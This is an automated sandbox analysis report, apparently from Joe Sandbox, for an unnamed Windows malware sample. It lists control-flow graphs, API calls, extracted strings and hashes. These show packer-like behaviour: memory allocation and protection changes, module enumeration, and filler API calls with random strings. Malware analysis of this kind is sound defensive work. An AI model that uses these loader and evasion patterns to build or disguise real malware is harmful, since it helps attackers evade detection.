                                            • Instruction ID: 183b284a51a4de45eb43a49aae16098dcfe43d07e968032702add6b6963ce898
                                            • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                            • Instruction Fuzzy Hash: ACB1C974A00209AFDB44CF98C895F9EBBB5FF88314F248158E909AB395D771AE41CF94

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 213 21707c6-21707df 214 21707e1-21707e3 213->214 215 21707e5 214->215 216 21707ea-21707f6 CreateToolhelp32Snapshot 214->216 215->216 217 2170806-2170813 Module32First 216->217 218 21707f8-21707fe 216->218 219 2170815-2170816 call 2170485 217->219 220 217081c-2170824 217->220 218->217 224 2170800-2170804 218->224 225 217081b 219->225 224->214 224->217 225->220
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021707EE
                                            • Module32First.KERNEL32(00000000,00000224), ref: 0217080E
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2170000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: d1445334c1a9b8c0c85dfdf0cfad7439b57ab0310973cf8d38e47b98da51e0b2
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 5DF062316407146FD7203BB5A88DB6F76F8AF8D725F100538E642911C0DB70E8458A61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 401530-401544 1 401546-40154f SetLastError 0->1 2 401551-401558 1->2 3 40155a-401566 1->3 2->1 2->3 4 401748-401ac1 CreateEventW call 403525 call 402986 call 403428 call 403b9a 3->4 5 40156c-4015a2 LocalAlloc VirtualProtect 3->5 28 401ac3-401ac9 4->28 6 4015a7-4015b1 SetLastError GetTickCount 5->6 6->6 8 4015b3-4015c3 6->8 10 4015c5-4015df 8->10 11 40163b 8->11 13 4015e1-401630 RemoveDirectoryW IsBadStringPtrA LoadLibraryA GetVolumeInformationA PurgeComm 10->13 14 401636-401639 10->14 15 40163d-401645 11->15 13->14 14->10 14->11 17 401685-40168c 15->17 18 401647-40167f SetComputerNameExW WriteConsoleW LoadLibraryExW GetConsoleAliasA 15->18 17->15 21 40168e-401694 call 4014ed 17->21 18->17 27 401696-40169d SetLastError 21->27 29 4016a4-4016ab 27->29 30 40169f call 401514 27->30 32 401ad6-401ae5 GetModuleFileNameA 28->32 33 401acb-401ad0 GetCharWidthI 28->33 29->27 31 4016ad-4016af 29->31 30->29 35 4016b0-4016ba 31->35 36 401af0-401afa 32->36 37 401ae7-401aee 32->37 33->32 38 401716 35->38 39 4016bc-401714 TzSpecificLocalTimeToSystemTime WriteConsoleW SetFileAttributesW BuildCommDCBA 35->39 40 401afc-401b2d call 40311d call 403720 call 401080 call 40109f call 4037ee 36->40 41 401b2e 36->41 37->28 37->36 42 401718-40171f 38->42 39->42 40->41 43 401b30-401b56 GetNumberFormatW GetLastError SetLastError 41->43 45 401721-401725 CreateEventW 42->45 46 40172b-40172c 42->46 47 401b62-401b69 43->47 48 401b58-401b60 43->48 45->46 46->35 50 40172e-40173a LoadLibraryA 46->50 47->43 51 401b6b-401b75 call 401530 47->51 48->47 48->51 55 401741-401747 50->55 56 401b7a 51->56 58 401b7f-401b89 56->58 61 401b9a-401b9b 58->61 62 401b8b-401b94 GetSystemDirectoryA 58->62 61->58 64 401b9d-401ba4 61->64 62->61
                                            APIs
                                            • SetLastError.KERNEL32(00000000,00000000,00000001,00000000), ref: 00401547
                                            • LocalAlloc.KERNELBASE(00000000,0007FD05), ref: 00401584
                                            • VirtualProtect.KERNELBASE(00000000,00000040,2FA0F88F), ref: 0040159C
                                            • SetLastError.KERNEL32(00000000), ref: 004015A8
                                            • GetTickCount.KERNEL32 ref: 004015AA
                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 004015E3
                                            • IsBadStringPtrA.KERNEL32(sesowalotorufowefave wupeyusibetanuk,00000000), ref: 004015F0
                                            • LoadLibraryA.KERNEL32(xitecesacocihuyirimiyuzowoweteg), ref: 004015FB
                                            • GetVolumeInformationA.KERNEL32(jiticisakakojiledig,?,00000000,?,?,0F3060F4,?,00000000), ref: 00401620
                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 0040162A
                                            • SetComputerNameExW.KERNEL32(00000000,jubekihofivep sewudujo jepedelavehumujiconikufofoze nap lapiyico), ref: 0040164E
                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040165E
                                            • LoadLibraryExW.KERNEL32(xivuxigosazixani,00000000,00000000), ref: 0040166D
                                            • GetConsoleAliasA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401679
                                            • SetLastError.KERNEL32(00000000), ref: 00401698
                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(?,7104DC19,4DDEDD50), ref: 004016E7
                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,73F34F3F,00000000), ref: 004016F7
                                            • SetFileAttributesW.KERNEL32(meromuzinavuzohuvu,00000000), ref: 00401703
                                            • BuildCommDCBA.KERNEL32(00000000,511CF560), ref: 0040170E
                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401725
                                            • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00401733
                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,gamovusahigave), ref: 00401756
                                              • Part of subcall function 00403525: __fsopen.LIBCMT ref: 00403530
                                              • Part of subcall function 00403B9A: _doexit.LIBCMT ref: 00403BA4
                                            • GetCharWidthI.GDI32(00000000,00000000,00000000,00000000,00000000,7104DC19,4DDEDD50,32F16B60,185911A7,511CF560,39E28F6C,127C64A9,39C630B1,21870240,7EA84DC7,7EA84DC7), ref: 00401AD0
                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000000,7104DC19,4DDEDD50,32F16B60,185911A7,511CF560,39E28F6C,127C64A9,39C630B1,21870240,7EA84DC7,7EA84DC7,4441C554,4E757E39), ref: 00401AD9
                                            • _calloc.LIBCMT ref: 00401AFE
                                            • _fseek.LIBCMT ref: 00401B06
                                            • GetNumberFormatW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B3D
                                            • GetLastError.KERNEL32 ref: 00401B43
                                            • SetLastError.KERNEL32(00000000), ref: 00401B4A
                                            • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00401B94
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: ErrorLast$ConsoleLibraryLoad$CommCreateDirectoryEventFileLocalNameSystemTimeWrite$AliasAllocAttributesBuildCharComputerCountFormatInformationModuleNumberProtectPurgeRemoveSpecificStringTickVirtualVolumeWidth__fsopen_calloc_doexit_fseek
                                            • String ID: 8*@$8Y<6$8q $9~uN$?<l-$E%os$gamovusahigave$jiticisakakojiledig$jubekihofivep sewudujo jepedelavehumujiconikufofoze nap lapiyico$meromuzinavuzohuvu$msimg32.dll$r$sesowalotorufowefave wupeyusibetanuk$xitecesacocihuyirimiyuzowoweteg$xivuxigosazixani$z&i>
                                            • API String ID: 162203167-3322250909
                                            • Opcode ID: 266e55543e78bd61230044ce620f7eb33ee2a16293c7d2e8708097af511e785a
                                            • Instruction ID: 7762e64ff74b316e068783f15468691cb6128d2b8b30a4f8c0156d9414773fa9
                                            • Opcode Fuzzy Hash: 266e55543e78bd61230044ce620f7eb33ee2a16293c7d2e8708097af511e785a
                                            • Instruction Fuzzy Hash: 38F1BDB1508340AFC310DF66D988AAFBBF8FB88704F10492DF595A7260C7B49945CF6A

                                            Control-flow Graph

                                            APIs
                                            • _malloc.LIBCMT ref: 00403BC6
                                              • Part of subcall function 00407CF0: __FF_MSGBANNER.LIBCMT ref: 00407D07
                                              • Part of subcall function 00407CF0: __NMSG_WRITE.LIBCMT ref: 00407D0E
                                              • Part of subcall function 00407CF0: HeapAlloc.KERNEL32(00530000,00000000,00000001,00000000,00000000,00000000,?,00404E54,00405CEC,00405CEC,00405CEC,00000000,?,00406D17,00000018,00417FF0), ref: 00407D33
                                            • std::exception::exception.LIBCMT ref: 00403BE4
                                            • __CxxThrowException@8.LIBCMT ref: 00403BF9
                                              • Part of subcall function 00403D8F: RaiseException.KERNEL32(?,?,004022A2,?,?,?,?,?,?,?,004022A2,?,00417DEC,?), ref: 00403DE4
                                            • ___crtGetShowWindowMode.LIBCMT ref: 00403C0B
                                              • Part of subcall function 00406E4A: GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00403C10,00417EE8,00000014,00000003,00417D7C), ref: 00406E54
                                            • _fast_error_exit.LIBCMT ref: 00403C6E
                                            • _fast_error_exit.LIBCMT ref: 00403C7F
                                            • __RTC_Initialize.LIBCMT ref: 00403C85
                                            • __ioinit.LIBCMT ref: 00403C8E
                                            • _fast_error_exit.LIBCMT ref: 00403C99
                                            • GetCommandLineW.KERNEL32(00417EE8,00000014,00000003,00417D7C,00000003,00000001), ref: 00403C9F
                                            • ___crtGetEnvironmentStringsW.LIBCMT ref: 00403CAA
                                            • __wsetargv.LIBCMT ref: 00403CB4
                                            • __wsetenvp.LIBCMT ref: 00403CC5
                                            • __cinit.LIBCMT ref: 00403CD8
                                            • __wwincmdln.LIBCMT ref: 00403CE9
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: _fast_error_exit$___crt$AllocCommandEnvironmentExceptionException@8HeapInfoInitializeLineModeRaiseShowStartupStringsThrowWindow__cinit__ioinit__wsetargv__wsetenvp__wwincmdln_mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 1274217231-0
                                            • Opcode ID: 34de4b0dec47fe959376c110c8d13bafd3370af2513aae66f09266ccc82565e8
                                            • Instruction ID: 923715916e9a3765d70d991b2f84e399c80372530a988729e0e840d900c51a75
                                            • Opcode Fuzzy Hash: 34de4b0dec47fe959376c110c8d13bafd3370af2513aae66f09266ccc82565e8
                                            • Instruction Fuzzy Hash: E33193716043059AEB10BFB6A946B6E3AAC9F0070EF10447FF904FA1D2EFBC9A50565D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 187 2210420-22104f8 189 22104fa 187->189 190 22104ff-221053c CreateWindowExA 187->190 191 22105aa-22105ad 189->191 192 2210540-2210558 PostMessageA 190->192 193 221053e 190->193 194 221055f-2210563 192->194 193->191 194->191 195 2210565-2210579 194->195 195->191 197 221057b-2210582 195->197 198 2210584-2210588 197->198 199 22105a8 197->199 198->199 200 221058a-2210591 198->200 199->194 200->199 201 2210593-2210597 call 2210110 200->201 203 221059c-22105a5 201->203 203->199
                                            APIs
                                            • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02210533
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                            • API String ID: 716092398-2341455598
                                            • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                            • Instruction ID: 143cf45b66d8c5618922490a09c9883e1e5a05c946fb3b771abf5006b85aa5e4
                                            • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                            • Instruction Fuzzy Hash: 9C511A70D08388EAEB11CBE8C849BDDBFF26F21708F144058D5447F28AC3BA5658CB66

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 204 22105b0-22105d5 205 22105dc-22105e0 204->205 206 22105e2-22105f5 GetFileAttributesA 205->206 207 221061e-2210621 205->207 208 2210613-221061c 206->208 209 22105f7-22105fe 206->209 208->205 209->208 210 2210600-221060b call 2210420 209->210 212 2210610 210->212 212->208
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022105EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID: apfHQ$o
                                            • API String ID: 3188754299-2999369273
                                            • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                            • Instruction ID: e28b8b5dc4d550e761b2378ce38154a15c716e7868a6fed9aaa08447bcf7e108
                                            • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                            • Instruction Fuzzy Hash: 55011E70C0429DEADB10DBD8C5587AEBFF5AF51308F148099C8092B241D7B69B98CBA1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 226 2170485-21704bf call 2170798 229 21704c1-21704f4 VirtualAlloc call 2170512 226->229 230 217050d 226->230 232 21704f9-217050b 229->232 230->230 232->230
                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021704D6
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2170000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: d4268998756afcda1a6334b1946b897647e79c0c6d494908dd369d4f78b8c8d2
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: AA113C79A40208EFDB01DF98C985E99BBF5AF08350F058094F9489B361D371EA90DF90
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040485B,?,?,?,00000000), ref: 0040719C
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 004071A5
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 6ae45ecafa3ac629cf61acffbe5f9ddd049829b4c7c42bc0b5ef8913bf588e28
                                            • Instruction ID: aeddbf3bdd2e49c05505039f75652dddf48dddaeb04ed195a151db5460708f30
                                            • Opcode Fuzzy Hash: 6ae45ecafa3ac629cf61acffbe5f9ddd049829b4c7c42bc0b5ef8913bf588e28
                                            • Instruction Fuzzy Hash: 05B09235044208ABCB102B91EE09B883F2AEB08652F008120F70D84060CBA25520CA9E
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0040716C
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2310707332.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000007.00000002.2310682718.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2310837369.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311018653.0000000000419000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311092801.000000000041A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004AC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311314882.00000000004F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000007.00000002.2311389200.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_400000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: c82fe9fddf3832e54a701ab95f46ca5a8e7ceca6a78b4636ae38843524364521
                                            • Instruction ID: 7566cd4a113dffafc520eb1d9bb918e1dc3aebe367d492660efc51926f0d0178
                                            • Opcode Fuzzy Hash: c82fe9fddf3832e54a701ab95f46ca5a8e7ceca6a78b4636ae38843524364521
                                            • Instruction Fuzzy Hash: 6BA0123000010CA78A001B41ED044843F1DD6041507004020F60C40020C76255208589
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2170000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                            • Instruction ID: 5e0328cc782d21bc8892c92c8b44473ebabc059df1fe2e7ecb131defc2dcaa2b
                                            • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                            • Instruction Fuzzy Hash: 3031693584A245AFCB15CE70D890AB5BB71EF87224F1995ACC4C98B102D3355046C794
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2170000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 2876f823d6acfd4dacded13340673782697500ab622517539f0c07be2a4ef31f
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: B1113CB2380201AFD754DE55DC81FA673EAEB8D360B198069ED08CB316D776E842CB60
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 381cae556dd3feeb35d9d5a494274e5c54357251123f432acef734e90cbfd476
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 0C1182723501009FD754DFA5DC90FA673EAFB98320B198165ED08CB315D675E941C760

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 725 2236437-2236440 726 2236442-2236446 725->726 727 2236466 725->727 726->727 728 2236448-2236459 call 2239636 726->728 729 2236468-223646b 727->729 732 223645b-2236460 call 2235ba8 728->732 733 223646c-223647d call 2239636 728->733 732->727 738 2236488-223649a call 2239636 733->738 739 223647f-2236480 call 223158d 733->739 744 22364ac-22364cd call 2235f4c call 2236837 738->744 745 223649c-22364aa call 223158d * 2 738->745 742 2236485-2236486 739->742 742->732 754 22364e2-2236500 call 223158d call 2234edc call 2234d82 call 223158d 744->754 755 22364cf-22364dd call 223557d 744->755 745->742 764 2236507-2236509 754->764 760 2236502-2236505 755->760 761 22364df 755->761 760->764 761->754 764->729
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                            • String ID:
                                            • API String ID: 1442030790-0
                                            • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                            • Instruction ID: 43e677761a587c9b91b48a77f13585c6602ced2ed840fcb28a0ee1d72538e486
                                            • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                            • Instruction Fuzzy Hash: 5B21CFF2624301BAE7333FE5CC01E2B7BEEDF42760B508029E548550ACEB628560CE58
                                            APIs
                                            • _memset.LIBCMT ref: 02233F51
                                              • Part of subcall function 02235BA8: __getptd_noexit.LIBCMT ref: 02235BA8
                                            • __gmtime64_s.LIBCMT ref: 02233FEA
                                            • __gmtime64_s.LIBCMT ref: 02234020
                                            • __gmtime64_s.LIBCMT ref: 0223403D
                                            • __allrem.LIBCMT ref: 02234093
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340AF
                                            • __allrem.LIBCMT ref: 022340C6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340E4
                                            • __allrem.LIBCMT ref: 022340FB
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02234119
                                            • __invoke_watson.LIBCMT ref: 0223418A
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                            • String ID:
                                            • API String ID: 384356119-0
                                            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                            • Instruction ID: 3d594bb0021cdbbe7c166fbaf83174a8e1b95cea3535d1da0ab277559336700b
                                            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                            • Instruction Fuzzy Hash: 7F71DCB1A20B17ABD719EEB9CC40B5A73B9BF10364F144179E514E6698EB70DA40CBD0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                            • String ID:
                                            • API String ID: 3432600739-0
                                            • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                            • Instruction ID: 13070783de127a844da865ecfea733f2e72da22a6ff5c4f06fe18d72e5cf3246
                                            • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                            • Instruction Fuzzy Hash: 4E4124F2924305BFDB02AFE4D980BAE3BFEAF04314F10442DE91496198CBB98544DF19
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ExitProcess___crt
                                            • String ID:
                                            • API String ID: 1022109855-0
                                            • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                            • Instruction ID: 558906d036ddeb4ea88fbf3840553051b634a0af95356c6ea759be9e724f0a94
                                            • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                            • Instruction Fuzzy Hash: 0431C8B3A10351DFCF135F94FC8084977A6FB14324705852AFA085B2B4CBB459C99F96
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 0225FC1F
                                              • Part of subcall function 0224169C: std::exception::_Copy_str.LIBCMT ref: 022416B5
                                            • __CxxThrowException@8.LIBCMT ref: 0225FC34
                                            • std::exception::exception.LIBCMT ref: 0225FC4D
                                            • __CxxThrowException@8.LIBCMT ref: 0225FC62
                                            • std::regex_error::regex_error.LIBCPMT ref: 0225FC74
                                              • Part of subcall function 0225F914: std::exception::exception.LIBCMT ref: 0225F92E
                                            • __CxxThrowException@8.LIBCMT ref: 0225FC82
                                            • std::exception::exception.LIBCMT ref: 0225FC9B
                                            • __CxxThrowException@8.LIBCMT ref: 0225FCB0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_2210000_7U1bGcxK3Lqi_XMHDNEdJrhB.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                            • String ID: leM
                                            • API String ID: 3569886845-2926266777
